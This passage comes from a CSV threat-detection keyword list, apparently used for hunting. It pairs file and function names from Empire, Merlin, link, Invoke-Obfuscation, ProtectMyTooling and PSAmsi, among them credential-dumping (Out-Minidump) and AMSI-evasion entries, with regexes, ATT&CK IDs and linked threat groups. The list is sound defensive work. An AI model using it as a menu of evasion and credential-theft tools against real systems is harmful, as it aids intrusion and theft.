APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54067" "*Out-Minidump *",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","54068" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54069" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 
TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54070" "*Out-ObfuscatedArrayExpressionAst *",".{0,1000}Out\-ObfuscatedArrayExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54071" "*Out-ObfuscatedArrayExpressionAst *",".{0,1000}Out\-ObfuscatedArrayExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54072" "*Out-ObfuscatedArrayLiteralAst *",".{0,1000}Out\-ObfuscatedArrayLiteralAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54073" "*Out-ObfuscatedArrayLiteralAst *",".{0,1000}Out\-ObfuscatedArrayLiteralAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54074" "*Out-ObfuscatedAssignmentStatementAst *",".{0,1000}Out\-ObfuscatedAssignmentStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54075" "*Out-ObfuscatedAssignmentStatementAst *",".{0,1000}Out\-ObfuscatedAssignmentStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54076" "*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54077" "*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54078" 
"*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54079" "*Out-ObfuscatedAstsReordered *",".{0,1000}Out\-ObfuscatedAstsReordered\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54080" "*Out-ObfuscatedAstsReordered *",".{0,1000}Out\-ObfuscatedAstsReordered\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54081" "*Out-ObfuscatedAttributeAst *",".{0,1000}Out\-ObfuscatedAttributeAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54082" "*Out-ObfuscatedAttributeAst *",".{0,1000}Out\-ObfuscatedAttributeAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented 
weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54083" "*Out-ObfuscatedAttributeBaseAst *",".{0,1000}Out\-ObfuscatedAttributeBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54084" "*Out-ObfuscatedAttributeBaseAst *",".{0,1000}Out\-ObfuscatedAttributeBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54085" "*Out-ObfuscatedAttributedExpressionAst *",".{0,1000}Out\-ObfuscatedAttributedExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54086" "*Out-ObfuscatedAttributedExpressionAst *",".{0,1000}Out\-ObfuscatedAttributedExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54087" "*Out-ObfuscatedBaseCtorInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedBaseCtorInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54088" "*Out-ObfuscatedBaseCtorInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedBaseCtorInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54089" "*Out-ObfuscatedBinaryExpressionAst *",".{0,1000}Out\-ObfuscatedBinaryExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54090" "*Out-ObfuscatedBinaryExpressionAst *",".{0,1000}Out\-ObfuscatedBinaryExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54091" "*Out-ObfuscatedBlockStatementAst *",".{0,1000}Out\-ObfuscatedBlockStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54092" "*Out-ObfuscatedBlockStatementAst *",".{0,1000}Out\-ObfuscatedBlockStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54093" "*Out-ObfuscatedBreakStatementAst *",".{0,1000}Out\-ObfuscatedBreakStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54094" "*Out-ObfuscatedBreakStatementAst *",".{0,1000}Out\-ObfuscatedBreakStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54095" "*Out-ObfuscatedCatchClauseAst *",".{0,1000}Out\-ObfuscatedCatchClauseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54096" "*Out-ObfuscatedCatchClauseAst *",".{0,1000}Out\-ObfuscatedCatchClauseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54097" "*Out-ObfuscatedChildrenAst *",".{0,1000}Out\-ObfuscatedChildrenAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54098" "*Out-ObfuscatedChildrenAst *",".{0,1000}Out\-ObfuscatedChildrenAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54099" 
"*Out-ObfuscatedCommandAst *",".{0,1000}Out\-ObfuscatedCommandAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54100" "*Out-ObfuscatedCommandAst *",".{0,1000}Out\-ObfuscatedCommandAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54101" "*Out-ObfuscatedCommandBaseAst *",".{0,1000}Out\-ObfuscatedCommandBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54102" "*Out-ObfuscatedCommandBaseAst *",".{0,1000}Out\-ObfuscatedCommandBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54103" "*Out-ObfuscatedCommandElementAst *",".{0,1000}Out\-ObfuscatedCommandElementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell 
v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54104" "*Out-ObfuscatedCommandElementAst *",".{0,1000}Out\-ObfuscatedCommandElementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54105" "*Out-ObfuscatedCommandExpressionAst *",".{0,1000}Out\-ObfuscatedCommandExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54106" "*Out-ObfuscatedCommandExpressionAst *",".{0,1000}Out\-ObfuscatedCommandExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54107" "*Out-ObfuscatedCommandParameterAst *",".{0,1000}Out\-ObfuscatedCommandParameterAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - 
TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54108" "*Out-ObfuscatedCommandParameterAst *",".{0,1000}Out\-ObfuscatedCommandParameterAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54109" "*Out-ObfuscatedConfigurationDefinitionAst *",".{0,1000}Out\-ObfuscatedConfigurationDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54110" "*Out-ObfuscatedConfigurationDefinitionAst *",".{0,1000}Out\-ObfuscatedConfigurationDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54111" "*Out-ObfuscatedConstantExpressionAst *",".{0,1000}Out\-ObfuscatedConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54112" "*Out-ObfuscatedConstantExpressionAst *",".{0,1000}Out\-ObfuscatedConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54113" "*Out-ObfuscatedContinueStatementAst *",".{0,1000}Out\-ObfuscatedContinueStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54114" "*Out-ObfuscatedContinueStatementAst *",".{0,1000}Out\-ObfuscatedContinueStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54115" "*Out-ObfuscatedConvertExpressionAst *",".{0,1000}Out\-ObfuscatedConvertExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54116" "*Out-ObfuscatedConvertExpressionAst *",".{0,1000}Out\-ObfuscatedConvertExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54117" "*Out-ObfuscatedDataStatementAst *",".{0,1000}Out\-ObfuscatedDataStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54118" "*Out-ObfuscatedDataStatementAst *",".{0,1000}Out\-ObfuscatedDataStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54119" "*Out-ObfuscatedDoUntilStatementAst *",".{0,1000}Out\-ObfuscatedDoUntilStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54120" "*Out-ObfuscatedDoUntilStatementAst *",".{0,1000}Out\-ObfuscatedDoUntilStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54121" "*Out-ObfuscatedDoWhileStatementAst *",".{0,1000}Out\-ObfuscatedDoWhileStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54122" "*Out-ObfuscatedDoWhileStatementAst *",".{0,1000}Out\-ObfuscatedDoWhileStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54123" "*Out-ObfuscatedDynamicKeywordStatementAst *",".{0,1000}Out\-ObfuscatedDynamicKeywordStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense 
